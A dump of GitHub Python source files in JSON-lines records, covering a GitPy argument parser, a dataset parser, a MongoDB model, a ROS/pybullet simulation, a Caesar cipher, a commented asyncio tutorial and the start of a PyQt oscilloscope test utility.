callable that accepts a single string argument, and\n returns the converted value. The standard Python types str, int,\n float, and complex are useful examples of such callables. If None,\n str is used.\n\n - choices -- A container of values that should be allowed. If not None,\n after a command-line argument has been converted to the appropriate\n type, an exception will be raised if it is not a member of this\n collection.\n\n - required -- True if the action must always be specified at the\n command line. This is only meaningful for optional command-line\n arguments.\n\n - help -- The help string describing the argument.\n\n - metavar -- The name to be used for the option's argument with the\n help string. If None, the 'dest' value will be used as the name.\n \"\"\"\n\n gitpy = Arguments(\n prog='gitpy',\n description='GitPy - A Python3 tool for search and download a GitHub\\'s repository directly in the terminal',\n usage='gitpy [options]',\n add_help=False,\n allow_abbrev=False,\n prefix_chars='-',\n formatter_class=lambda prog: BetterHelpFormatter(prog, max_help_position=80, width=100,indent_increment=2),\n )\n\n cls._add_main_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Main options{W}')))\n cls._add_installation_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Installation options{W}')))\n cls._add_repo_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Repository options{W}')))\n cls._add_output_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Output options{W}')))\n cls._add_additional_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Additional options{W}')))\n cls._add_informations_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Informations options{W}')))\n cls._add_miscellaneous_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Miscellaneous options{W}')))\n # cls._add_test_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Test options{W}')))\n\n # argcomplete.autocomplete(parser)\n return gitpy.parse_args()\n\n\n # -------------------- [ Main Arguments ] -------------------- #\n @classmethod\n def _add_main_args(cls,main):\n main.add_argument(\n '--console',\n action='store_true',\n dest='console',\n help='start tthe main console of GitPy'\n )\n main.add_argument(\n '--cli',\n action='store_true',\n dest='cli',\n help='start the CLI environment of GitPy'\n )\n\n\n # -------------------- [ Installation Arguments ] -------------------- #\n @classmethod\n def _add_installation_args(cls,install):\n install.add_argument(\n '-i','--install',\n action='store_true',\n dest='install',\n help='install GitPy with all depencies on your system'\n )\n install.add_argument(\n '--uninstall',\n action='store_true',\n help='uninstall GitPy from your system'\n )\n install.add_argument(\n '--skip-update',\n action='store_true',\n dest='skip_update',\n help='skip the system update phase during the installation of GitPy'\n )\n install.add_argument(\n '--offline',\n action='store_true',\n dest='offline',\n help='install GitPy with the local file already downloaded. By default, the Installer download the latest version from GitHub and install it on the machine'\n )\n install.add_argument(\n '-iP','--install-path',\n type=str,\n nargs='?',\n const='0',\n metavar='PATH',\n dest='install_path',\n help=Color.s('the path where GitPy will be installed (default: {G}%s{W})' % Configuration.DEFAULT_INSTALL_PATH),\n )\n\n\n # -------------------- [ Repository Arguments ] -------------------- #\n @classmethod\n def _add_repo_args(cls,repo):\n repo.add_argument(\n '-cr','--check-repo',\n action='store_true',\n dest='check_repo',\n help=Color.s('check if the repository in the notification config file have a new commit avalable and send a notificarion via mail if it\\'s the case')\n )\n\n repo.add_argument(\n '-us','--unsub',\n action='store_true',\n dest='unsub',\n help=Color.s('allows you to delete a subscription by mail from a Github directory')\n )\n\n\n # -------------------- [ Output Arguments ] -------------------- #\n @classmethod\n def _add_output_args(cls,output):\n output.add_argument(\n '-q','--quiet',\n action='store_true',\n help=Color.s('prevent header from displaying. {O}Warning{W}: bypass any \"Are your sure?\" message!')\n )\n output.add_argument(\n '-v','--verbose',\n type=int,\n nargs='?',\n const=1,\n choices=[1,2,3],\n metavar='LEVEL',\n dest='verbose',\n help=Color.s('verbosity level: 1-2 (default: {G}0{W} | const: {G}%(const)s{W})')\n )\n\n\n # -------------------- [ Additional Arguments ] -------------------- #\n @classmethod\n def _add_additional_args(cls,add):\n add.add_argument(\n '-y','--no-confirm',\n action='store_true',\n dest='no_confirm',\n help='bypass any and all \"Are you sure?\" messages.'\n )\n\n\n # -------------------- [ Informations Arguments ] -------------------- #\n @classmethod\n def _add_informations_args(cls,info):\n info.add_argument(\n '--info',\n action='store_true',\n help='show more informations about GitPy and exit'\n )\n info.add_argument(\n '-h','--help',\n action='store_true',\n # action='help',\n help='show this help message and exit'\n )\n info.add_argument(\n '-V','--version',\n action='store_true',\n help=f\"show program's version and exit\"\n )\n\n\n # -------------------- [ Miscellaneous Arguments ] -------------------- #\n @classmethod\n def _add_miscellaneous_args(cls,misc):\n misc.add_argument(\n '--update',\n action='store_true',\n dest='update',\n help='update GitPy directly from GitHub'\n )\n misc.add_argument(\n '-fu','--force-update',\n action='store_true',\n dest='force_update',\n help='update AOVPN even if the version on the machine is already the latest'\n )\n misc.add_argument(\n '--show-config',\n action='store_true',\n dest='show_config',\n help='show the value of the config file'\n )\n misc.add_argument(\n '--show-env-var',\n type=str,\n nargs='?',\n const='install_path',\n choices=['install_path','notif_conf_path'],\n dest='show_env_var',\n help='prompt the value of the a environment variable'\n )\n misc.add_argument(\n '--remove-cache',\n action='store_true',\n dest='remove_cache',\n help='delete any \\'__pycache__\\' folder in the GitPy\\' directory'\n )\n\n\n # -------------------- [ Tests Arguments ] -------------------- #\n # @classmethod\n # def _add_test_args(cls,test):\n # test.add_argument(\n # '--process',\n # action='store_true',\n # dest='process',\n # )\n","repo_name":"MyMeepSQL/GitPy","sub_path":"src/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":12353,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"33760149067","text":"import numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nimport utils\n\n'''\nInput:\n there are 34 attributes, missing marked with ?\n\nOutput:\n (data, labels)\n'''\ndef parse_dermatology(fp):\n with open(fp) as f:\n text = f.read()\n\n enc = OneHotEncoder(handle_unknown='error', categories='auto')\n\n labels = []\n unencoded_data = []\n for line in text.splitlines():\n splitted = line.split(\",\")\n assert(len(splitted) == 35)\n\n missing_val = False\n for attr in splitted:\n if attr == '?':\n missing_val = True\n break\n if missing_val:\n continue\n\n labels.append(int(splitted[34]))\n unencoded_data.append(splitted[:34])\n\n data = enc.fit_transform(unencoded_data).toarray()\n print(data.shape)\n return (data, np.array(labels))\n\nif __name__ == \"__main__\":\n (data, labels) = parse_dermatology(\"../data/dermatology/dermatology.data\")\n print(data[:10])\n print(labels[:10])\n (train_data, train_labels, test_data, test_labels) = utils.split_train_test(data, labels)\n utils.save_protobuf(train_data, train_labels, \"dermatology_train\")\n utils.save_protobuf(test_data, test_labels, \"dermatology_test\")\n\n","repo_name":"kaiwenw/DPDDT","sub_path":"python/preprocess/parse_dermatology.py","file_name":"parse_dermatology.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5185892983","text":"import re\n\n\nclass Post():\n def __init__(self, DataBase):\n self.database = DataBase\n self.table = 'post'\n\n def get_by_id(self, _id):\n item = self.database.find(self.table, {\"_id\": _id})\n return item\n\n def remove_by_id(self, _id):\n return self.database.delete(self.table, {\"_id\": int(_id)})\n\n def remove_comment(self, post_id, comment_id):\n return self.database.update(\n self.table,\n {\"_id\": int(post_id)},\n {\"$pull\":\n {\"comments\": {\"_id\": int(comment_id)}}\n },\n False\n )\n\n def latest(self, _from, _to, category):\n if category == 'All':\n search = {}\n else:\n category = [i for i in category if i != 'All']\n category = [re.compile(i, re.IGNORECASE) for i in category]\n search = {\"tags.name\": {\"$all\": category}}\n\n print(search)\n items = self.database.db[self.table].find(\n search).sort(\"_id\", -1)[_from:_to]\n return items\n\n def create(self, data):\n # here only the required fields are passed\n _post = {\n '_id': data['_id'],\n 'title': data['title'],\n 'tags': data['tags'],\n 'body': data['body'],\n 'timestamp': data['timestamp'],\n 'user': data['user'],\n 'institution': data['institution'],\n 'email': data['email'],\n 'comments_count': data['comments_count'],\n 'comments': data['comments'],\n 'like': data['likes'],\n 'date': data['date'],\n 'views': data['views'],\n 'user_id': data['user_id'],\n 'followers': []\n }\n\n try:\n assert(self.database.insert(self.table, _post))\n return _post\n except Exception as e:\n return {'status': False, 'message': str(e)}\n\n def add_comment(self, comment, post_id):\n update = self.database.update(\n self.table,\n {\"_id\": post_id},\n {\"$push\": {\"comments\": comment}},\n True\n )\n\n # update the number of posts:\n number_posts = len(self.database.find(\n self.table, {\"_id\": post_id})[0]['comments'])\n\n # update the number of posts\n update = self.database.update(\n self.table,\n {\"_id\": post_id},\n {\"$set\": {\"comments_count\": number_posts}},\n True\n )\n\n def update_post(self, data):\n # update title\n update = self.database.update(\n self.table,\n {\"_id\": int(data['_id'])},\n {\"$set\": {\n \"title\": data['title'],\n \"body\": data['body'],\n \"tags\": data['tags']\n }\n },\n True\n )\n\n return {\"status\": True}\n\n def update(self, field, value, _id):\n # update master table with the new data from the manual inspection\n update = self.database.update(\n self.table,\n {\"_id\": _id},\n {\n \"$set\": {\n field: value\n }\n },\n True\n )\n\n return update\n\n def push(self, _id, key, value):\n update = self.database.update(\n self.table,\n {\"_id\": _id},\n {\"$addToSet\": {key: value}},\n True\n )\n\n return update\n\n def pull(self, _id, key, value):\n update = self.database.update(\n self.table,\n {\"_id\": _id},\n {\"$pull\": {key: {\"_id\": value['_id']}}},\n True\n )\n return update\n","repo_name":"gaarangoa/ARGminer","sub_path":"backend/rest/MetadataInterface/PostClass.py","file_name":"PostClass.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"32445750420","text":"#! /usr/bin/env python3\n\nimport rospy\nimport pybullet as pyb\nimport pybullet_data\nfrom humanoid_bullet_control import HumanoidControl\nfrom cobot_utils.ur_bullet_control import URControl\nfrom cobot_utils.ur_execution_manager import URExecutionManager\nfrom cobot_utils.human_pose_data_streamer import HumanPoseDataStreamer\nimport numpy as np\n\nimport time\n\ndef main():\n # ros node initialization\n rospy.init_node(\"pybullet_ros_bridge\", anonymous=True)\n \n # pybullet initialization\n gui_id = pyb.connect(pyb.GUI)\n pyb.setAdditionalSearchPath(pybullet_data.getDataPath(), physicsClientId=gui_id)\n pyb.setGravity(0, 0, -10)\n pyb.setRealTimeSimulation(True)\n\n # load ground URDF\n ground_id = pyb.loadURDF('plane.urdf', [0, 0, 0], useFixedBase=True, physicsClientId=gui_id)\n\n # load ur_controller\n ur_control = URControl(gui_id)\n\n # humanoid controller\n humanoid_control = HumanoidControl(gui_id)\n humanoid_control.load_config('/home/omkar/ros_workspaces/robotics_lab_ws/src/cobot_bullet_sim/config/humanoid_controllers.yaml')\n\n # human pose data loader\n pose_stream = HumanPoseDataStreamer('/home/omkar/ros_workspaces/robotics_lab_ws/src/cobot_bullet_sim/data/hammer5.npy', fps=15)\n pose_stream.start()\n\n ur_mgr = URExecutionManager()\n \n time.sleep(1)\n\n # load models\n ur_control.load_model(\n '/home/omkar/ros_workspaces/robotics_lab_ws/src/fmauch_universal_robot/ur_description/urdf/model.urdf',\n [0.5, -0.2, 0.5]\n )\n humanoid_control.load_model('humanoid/humanoid.urdf', pose_stream.get_joint_position_set())\n\n while not rospy.is_shutdown():\n ur_control.update(ur_mgr.get_joint_state())\n humanoid_control.update(pose_stream.get_joint_position_set())\n\n collision_info = pyb.getClosestPoints(humanoid_control._humanoid_id, ur_control._ur_id, 0.05)\n if len(collision_info) > 0:\n ur_mgr.cancel_execution()\n\nif __name__ == '__main__':\n main()","repo_name":"OmkarKabadagi5823/cobot_bullet_sim_ros","sub_path":"scripts/cobot_bullet_sim.py","file_name":"cobot_bullet_sim.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9923109318","text":"\"\"\"Caesar cipher.\"\"\"\n\n\ndef encode(word, shift):\n \"\"\"\"Encode a message using a Caesar cipher.\"\"\"\n string = \"abcdefghijklmnopqrstuvwxyz\"\n result = \"\"\n for letter in word:\n if letter.isalpha():\n number = (string.index(letter))\n new_number = (number + shift) % 26\n result += string[new_number]\n else:\n result += letter\n\n return result\n\n\nprint(encode(\"i like turtles\", 6))\nprint(encode(\"o roqk zaxzrky\", 20))\nprint(encode(\"example\", 1))\nprint(encode(\"don't change\", 0))\nprint(encode('the quick brown fox jumps over the lazy dog.', 7))\n","repo_name":"saplee/Python","sub_path":"EX/ex02_math/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"46294849582","text":"import asyncio\nfrom random import random\nimport time\nfrom urllib.parse import urlsplit\n\n\n\"\"\"\nПример получения задачи (Task) из основной корутины\n\"\"\"\n#\n#\n# async def main(): # Определяем главную корутину\n# print('main coroutine started') # Контрольное сообщение\n# task = asyncio.current_task() # Получаем текущую задачу\n# print(task) # Контрольное сообщение о задаче\n#\n# asyncio.run(main()) # Запускаем главную корутину\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере мы сначала создаем 10 задач, каждая из которых выполняет одну и ту же корутину.\nЗатем основная корутина получает набор всех задач, запланированных или выполняемых в прогрмме, и сообщает их детали.\n\"\"\"\n\n\n# # coroutine for a task\n# async def task_coroutine(value):\n# # report a message\n# print(f'task {value} is running')\n# # block for a moment\n# await asyncio.sleep(1)\n#\n#\n# # define a main coroutine\n# async def main():\n# # report a message\n# print('main coroutine started')\n# # start many tasks\n# started_tasks = [asyncio.create_task(task_coroutine(i)) for i in range(10)]\n# # allow some of the tasks time to start\n# await asyncio.sleep(0.1)\n# # get all tasks\n# tasks = asyncio.all_tasks()\n# # report all tasks\n# for task in tasks:\n# print(f'> {task.get_name()}, {task.get_coro()}')\n# # wait for all tasks to complete\n# for task in started_tasks:\n# await task\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере корутина main() (- она же entrypoint) с помощью генератора списков создаёт список объектов корутины\ntask_coro, который передается функции gather(), затем распаковывается с помощью оператора * в 10 отдельных выражений,\nзатем корутина main() ожидает объект Future, возвращенный вызовом gather(), приостанавливая и ожидая завершения\nвыполнения всех запланированных корутин. Корутины запускаются, сообщают о результатах и засыпают перед завершением.\nИ только после этого корутина main() возобновляет свою работу и сообщает об успешном окончании сообщением main done\n\"\"\"\n\n\n# coroutine used for a task\n# async def task_coro(value):\n# # report a message\n# print(f'>task {value} executing')\n# # sleep for a moment\n# await asyncio.sleep(1)\n#\n#\n# # coroutine used for the entry point\n# async def main():\n# # report a message\n# print('main starting')\n# # create many coroutines\n# coros = [task_coro(i) for i in range(10)]\n# # run the tasks\n# await asyncio.gather(*coros)\n# # report a message\n# print('main done')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере показано, как мы можем использовать функцию wait() для ожидания завершения набора задач.\nОпять же, корутина main() используется как точка входа в программу asyncio. В ней создается список из 10 задач, каждая\nиз которых представляет случайный целочисленный аргумент от 0 до 9. Затем корутина main приостанавливается и ожидает\nзавершения всех задач. Каждая задача генерирует случайное значение 0-1 и засыпает на время в секундах от этого значения,\nа затем печатает резульатат об этом значении. После того, как все задачи будут выполнены, main() сообщит об этом.\n\"\"\"\n\n\n# coroutine to execute in a new task\n# async def task_coro(arg):\n# # generate a random value between 0 and 1\n# value = random()\n# # block for a moment\n# await asyncio.sleep(value)\n# # report the value\n# print(f'>task {arg} done with {value}')\n#\n#\n# # main coroutine\n# async def main():\n# # create many tasks\n# tasks = [asyncio.create_task(task_coro(i)) for i in range(10)]\n# # wait for all tasks to complete\n# done, pending = await asyncio.wait(tasks)\n# # report results\n# print('All done')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере entrypoint - main() создаёт корутину задачи task_coro, вызывает wait_for(), передаёт параметарми\nзадачу и таймер на выполнение задачи в секундах. Корутина main() приостанавливается, ожидая выполнения задачи task_coro\nи возобновляет свою работу по истечению таймера timeout. wait_for() отменяет задачу task_coro, которая отвечает\nна запрос о прекращении и вызывает исключение TimeoutError и завершает работу. main() запускается и обрабатывает\nошибку TimeoutError.\n\"\"\"\n\n\n# # example of waiting for a coroutine with a timeout\n#\n# # coroutine to execute in a new task\n# async def task_coro(arg):\n# # generate a random value between 0 and 1\n# value = 1 + random()\n# # report message\n# print(f'>task got {value}')\n# # block for a moment\n# await asyncio.sleep(value)\n# # report all done\n# print('>task done')\n#\n#\n# # main coroutine\n# async def main():\n# # create a task\n# task = task_coro(1)\n# # execute and wait for the task without a timeout\n# try:\n# await asyncio.wait_for(task, timeout=0.2)\n# except asyncio.TimeoutError:\n# print('Wake up, Neo, you are obosralsya')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ entrypoint main() создается корутина coro, которая упаковывается в задачу task и защищается щитом в shielded.\nЗатем она передается в cancel_task(), которая оборачивается задачей, когда в дальнейшем main() ожидает защищенную\nзадачу, которая ожидает исключения CancelledError. simple_task выполняется, а затем засыпает, cancel_task запускается,\nзасыпает на мгновение и отменяет защищенную задачу, а запрос сообщает об успешной отмене. Получается исключение\nCancelldeError в защищенном от отмены объекте Future, а не во внутренней задаче simple_task.\n\"\"\"\n\n# example of using asyncio shield to protect a task from cancellation\n#\n#\n# # define a simple asynchronous\n# async def simple_task(number):\n# # block for a moment\n# await asyncio.sleep(1)\n# # return the argument\n# return number\n#\n#\n# # cancel the given task after a moment\n# async def cancel_task(task):\n# # block for a moment\n# await asyncio.sleep(0.2)\n# # cancel the task\n# was_cancelled = task.cancel()\n# print(f'cancelled: {was_cancelled}')\n#\n#\n# # define a simple coroutine\n# async def main():\n# # create the coroutine\n# coro = simple_task(1)\n# # create a task\n# task = asyncio.create_task(coro)\n# # created the shielded task\n# shielded = asyncio.shield(task)\n# # create the task to cancel the previous task\n# asyncio.create_task(cancel_task(shielded))\n# # handle cancellation\n# try:\n# # await the shielded task\n# result = await shielded\n# # report the result\n# print(f'>got: {result}')\n# except asyncio.CancelledError:\n# print('shielded was cancelled')\n# # wait a moment\n# await asyncio.sleep(1)\n# # report the details of the tasks\n# print(f'shielded: {shielded}')\n# print(f'task: {task}')\n#\n#\n# # start\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере мы запускаем блокирующую функцию в асинхронной программе с помощью to_thread() в entrypoint main().\nСначала с помощью to_thread() мы оборачиваем блокирующую функцию в корутину для пула потоков и оборачиваем её в задачу\ntask. Затем мы приостанавливаем main(), что позволяет выполниться задаче task под капотом через ThreadPoolExecutor.\nТем временем blocking_task сообщает о начале, тормозит на 2 секунды и после сообщает о завершении.\n\"\"\"\n\n# # example of running a blocking io-bound task in asyncio\n#\n#\n# # a blocking io-bound task\n# def blocking_task():\n# # report a message\n# print('Task starting')\n# # block for a while\n# time.sleep(2)\n# # report a message\n# print('Task done')\n#\n#\n# # main coroutine\n# async def main():\n# # report a message\n# print('Main running the blocking task')\n# # create a coroutine for the blocking task\n# coro = asyncio.to_thread(blocking_task)\n# # schedule the task\n# task = asyncio.create_task(coro)\n# # report a message\n# print('Main doing other things')\n# # allow the scheduled task to start\n# await asyncio.sleep(0)\n# # await the task\n# await task\n#\n#\n# # run the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере мы используем корутину main() как точку входа в программу asyncio, она запускается и запускает цикл for.\nСоздается экземпляр асинхронного итератора, и цикл автоматически выполняет его с помощью функции anext() для возврата \nожидаемого объекта. Затем цикл ожидает ожидаемого и извлекает значение, которое становится доступным для тела цикла, \nв котором оно сообщается.\n\"\"\"\n\n# # example of an asynchronous iterator with async for loop\n#\n#\n# # define an asynchronous iterator\n# class AsyncIterator:\n# # constructor, define some state\n# def __init__(self):\n# self.counter = 0\n#\n# # create an instance of the iterator\n# def __aiter__(self):\n# return self\n#\n# # return the next awaitable\n# async def __anext__(self):\n# # check for no further items\n# if self.counter >= 10:\n# raise StopAsyncIteration\n# # increment the counter\n# self.counter += 1\n# # simulate work\n# await asyncio.sleep(1)\n# # return the counter value\n# return self.counter\n#\n#\n# # main coroutine\n# async def main():\n# # loop over async iterator with async for loop\n# async for item in AsyncIterator():\n# print(item)\n#\n#\n# # execute the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\"\"\"\nВ этом примере цикл будет автоматически ожидать каждого ожидаемого объекта, возвращаемого генератором, извлекать \nполученное значение и делать его доступным в теле цикла, чтобы в этом случае о нем можно было сообщить.\n\"\"\"\n\n# # example of asynchronous generator with async for loop\n#\n#\n# # define an asynchronous generator\n# async def async_generator():\n# # normal loop\n# for i in range(10):\n# # block to simulate doing work\n# await asyncio.sleep(1)\n# # yield the result\n# yield i\n#\n#\n# # main coroutine\n# async def main():\n# # loop over async generator with async for loop\n# async for item in async_generator():\n# print(item)\n#\n#\n# # execute the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере наша корутина main() при запуске создаёт экземпляр класса AsyncContextManager в выражении async with.\nЭто выражение автоматически вызывает метод __aenter__, выводит сообщение и блокируется на мгновение, тогда main()\nвозобновляется и выполныет тело контекста (печать сообщения). Блок закрываетя автоматически при помощи вызова метода \n__aexit__, который сообщает нам о закрытии и заспыает на мгновение. \n\"\"\"\n\n\n# # example of an asynchronous context manager via async with\n# # define an asynchronous context manager\n# class AsyncContextManager:\n# # enter the async context manager\n# async def __aenter__(self):\n# # report a message\n# print('>entering the context manager')\n# # block for a moment\n# await asyncio.sleep(0.5)\n#\n# # exit the async context manager\n# async def __aexit__(self, exc_type, exc, tb):\n# # report a message\n# print('>exiting the context manager')\n# # block for a moment\n# await asyncio.sleep(0.5)\n#\n#\n# # define a simple coroutine\n# async def main():\n# # create and use the asynchronous context manager\n# async with AsyncContextManager() as manager:\n# # report the result\n# print(f'within the manager')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере мы выполним команду echo для возвращения строки 'Hello World'. Корутина main() вызывает функцию \ncreate_subprocess_exec() и приостанавливается на время выполения процесса, экземпляр процесса возвращается,\nкорутина продолжает работу и сообщает детали работы процесса. Вывод команды echo отображается в командной строке.\n\"\"\"\n\n# # example of executing a command as a subprocess with asyncio\n#\n#\n# # main coroutine\n# async def main():\n# # start executing a command in a subprocess\n# process = await asyncio.create_subprocess_exec('echo', 'Hello World')\n# # report the details of the subprocess\n# print(f'subprocess: {process}')\n#\n#\n# # entry point\n# asyncio.run(main())\n########################################################################################################################\n\n\"\"\"\nВ этом примере мы выполним команду 'echo' , чтобы вернуть строку.\nКоманда echo сообщит предоставленную строку напрямую в стандартный вывод.\n\"\"\"\n\n# # example of executing a shell command as a subprocess with asyncio\n#\n#\n# # main coroutine\n# async def main():\n# # start executing a shell command in a subprocess\n# process = await asyncio.create_subprocess_shell('echo Hello World')\n# # report the details of the subprocess\n# print(f'subprocess: {process}')\n#\n#\n# # entry point\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nВ этом примере мы получим статус 10 популярных сайтов, используя asyncio\n\"\"\"\n\n# # check the status of many webpages\n#\n#\n# # get the HTTP/S status of a webpage\n# async def get_status(url):\n# # split the url into components\n# url_parsed = urlsplit(url)\n# # open the connection\n# if url_parsed.scheme == 'https':\n# reader, writer = await asyncio.open_connection(url_parsed.hostname, 443, ssl=True)\n# else:\n# reader, writer = await asyncio.open_connection(url_parsed.hostname, 80)\n# # send GET request\n# query = f'GET {url_parsed.path} HTTP/1.1\\r\\nHost: {url_parsed.hostname}\\r\\n\\r\\n'\n# # write query to socket\n# writer.write(query.encode())\n# # wait for the bytes to be written to the socket\n# await writer.drain()\n# # read the single line response\n# response = await reader.readline()\n# # close the connection\n# writer.close()\n# # decode and strip white space\n# status = response.decode().strip()\n# # return the response\n# return status\n#\n#\n# # main coroutine\n# async def main():\n# # list of top 10 websites to check\n# sites = ['https://www.google.com/',\n# 'https://www.youtube.com/',\n# 'https://www.facebook.com/',\n# 'https://twitter.com/',\n# 'https://www.instagram.com/',\n# 'https://www.baidu.com/',\n# 'https://www.wikipedia.org/',\n# 'https://yandex.ru/',\n# 'https://yahoo.com/',\n# 'https://www.whatsapp.com/'\n# ]\n# # check the status of all websites\n# for url in sites:\n# # get the status for the url\n# status = await get_status(url)\n# # report the url and its status\n# print(f'{url:30}:\\t{status}')\n#\n#\n# # run the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\"\"\"\nОдновременный просмотр статуса сайтов через функцию gather()\n\"\"\"\n\n\n# get the HTTP/S status of a webpage\nasync def get_status(url):\n # split the url into components\n url_parsed = urlsplit(url)\n # open the connection\n if url_parsed.scheme == 'https':\n reader, writer = await asyncio.open_connection(url_parsed.hostname, 443, ssl=True)\n else:\n reader, writer = await asyncio.open_connection(url_parsed.hostname, 80)\n # send GET request\n query = f'GET {url_parsed.path} HTTP/1.1\\r\\nHost: {url_parsed.hostname}\\r\\n\\r\\n'\n # write query to socket\n writer.write(query.encode())\n # wait for the bytes to be written to the socket\n await writer.drain()\n # read the single line response\n response = await reader.readline()\n # close the connection\n writer.close()\n # decode and strip white space\n status = response.decode().strip()\n # return the response\n return status\n\n\n# main coroutine\nasync def main():\n # list of top 10 websites to check\n sites = ['https://www.google.com/',\n 'https://www.youtube.com/',\n 'https://www.facebook.com/',\n 'https://twitter.com/',\n 'https://www.instagram.com/',\n 'https://www.baidu.com/',\n 'https://www.wikipedia.org/',\n 'https://yandex.ru/',\n 'https://yahoo.com/',\n 'https://www.whatsapp.com/'\n ]\n # create all coroutine requests\n coros = [get_status(url) for url in sites]\n # execute all coroutines and wait\n results = await asyncio.gather(*coros)\n # process all results\n for url, status in zip(sites, results):\n # report status\n print(f'{url:30}:\\t{status}')\n\n\n# run the asyncio program\nasyncio.run(main())\n########################################################################################################################\n","repo_name":"Dmitrykevich/asyncio_cheat_sheet","sub_path":"asyncio_learn.py","file_name":"asyncio_learn.py","file_ext":"py","file_size_in_byte":21235,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71741231130","text":"#!python3\n\nimport sys\nimport threading\nfrom queue import Queue\nfrom time import sleep\nfrom datetime import datetime\nfrom ctypes import c_int\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtGui, uic\nfrom PyQt5.QtCore import QRect, QRectF, Qt, pyqtSlot\nfrom ns_commander import NS3_Commander\nfrom ns_anim import NS_Animate\n\n\n__version__ = 2.574\n\n# main window class\nclass ns_utility(QMainWindow):\n\n log_signal = QtCore.pyqtSignal(str, str)\n test_progress_signal = QtCore.pyqtSignal(int)\n device_ready_signal = QtCore.pyqtSignal(bool)\n\n # constructor\n def __init__(self):\n super().__init__()\n\n # Create the queue for threads\n self.nqueue = Queue()\n # init user interface\n self.initUI()\n\n # connect signals/slots\n self.closeButton.clicked.connect(self.CloseButtonClicked)\n self.startButton.clicked.connect(self.StartButtonClicked)\n self.test_progress_signal.connect(self.test_progress_slot)\n self.device_ready_signal.connect(self.device_ready_slot)\n self.log_signal.connect(self.qlog_message)\n\n # neiscope device command 'driver' object\n self.ns3 = NS3_Commander()\n\n # thread for comunicate neilscope device\n t = threading.Thread(target=self.ns_test_worker)\n t.daemon = True # thread dies when main thread exits.\n t.start()\n\n # start animation\n self.anim.machine.start()\n\n # set window to center and show\n self.center()\n self.show()\n\n self.start_msg = [\n 'Testing util build ver: %.3f' % __version__,\n 'NeilScope 3',\n 'The full free SW/HW project',\n 'of 100Msps(2-CH) 200Msps(1-CH) digital storage',\n 'Oscilloscope and Logic Analyzer modes',\n 'Contributors:',\n '---',\n 'Vladislav Kamenev :: LeftRadio',\n 'Ildar :: Muha',\n '---',\n 'Special thanks to all who supported the project all the time !!!' ]\n self.nqueue.put('start')\n\n # initialization UI\n def initUI(self):\n # load main ui window\n self.uic = uic.loadUi('main.ui', self)\n\n gr_rect = QRectF(0, 0, self.rect().width(), 20)\n self.scene = QGraphicsScene(gr_rect)\n self.scene.setBackgroundBrush(Qt.black)\n\n self.anim = NS_Animate(self.scene,\n gr_rect.width(), gr_rect.height(),\n QtGui.QColor.fromRgb(0, 32, 49))\n\n self.horizontalLayout_anim.addWidget(self.anim.window)\n\n # self.anim.start()\n self.anim.window.resize(gr_rect.width(), gr_rect.height())\n\n # set window to center func\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n # self logging message\n def log(self, msg, lvl='ginf'):\n self.log_signal.emit('\\'GL\\' ' + msg, lvl)\n\n # device test sequence\n def ns_test_seq(self):\n # neilscope device test sequence program, [ command function, [func args], delay sec after, log mesaage ]\n ns_test_sequence = [\n {'cmd': self.ns3.mode, 'data': 'la', 'delay': 0, 'msg': 'set mode \\'LA\\'...'},\n {'cmd': self.ns3.send_sw_ver, 'data': [1.1, 0x02], 'delay': 0.5, 'msg': 'send sw ver...'},\n {'cmd': self.ns3.mode, 'data': 'osc', 'delay': 0, 'msg': 'set mode \\'OSC\\'...'},\n {'cmd': self.ns3.send_sw_ver, 'data': [1.1, 0x02], 'delay': 0.5, 'msg': 'send sw ver...'},\n {'cmd': self.ns3.ach_state, 'data': ['AB', 'dc'], 'delay': 0, 'msg': 'set ch A/B DC input...'},\n {'cmd': self.ns3.ach_div, 'data': ['AB', '50V'], 'delay': 0.05, 'msg': 'set ch A/B 50V/div...'},\n {'cmd': self.ns3.ach_div, 'data': ['AB', '50mV'], 'delay': 0.05, 'msg': 'set ch A/B 50mV/div...'},\n {'cmd': self.ns3.sync_mode, 'data': ['off'], 'delay': 0, 'msg': 'set sync off state...'},\n {'cmd': self.ns3.sync_sourse, 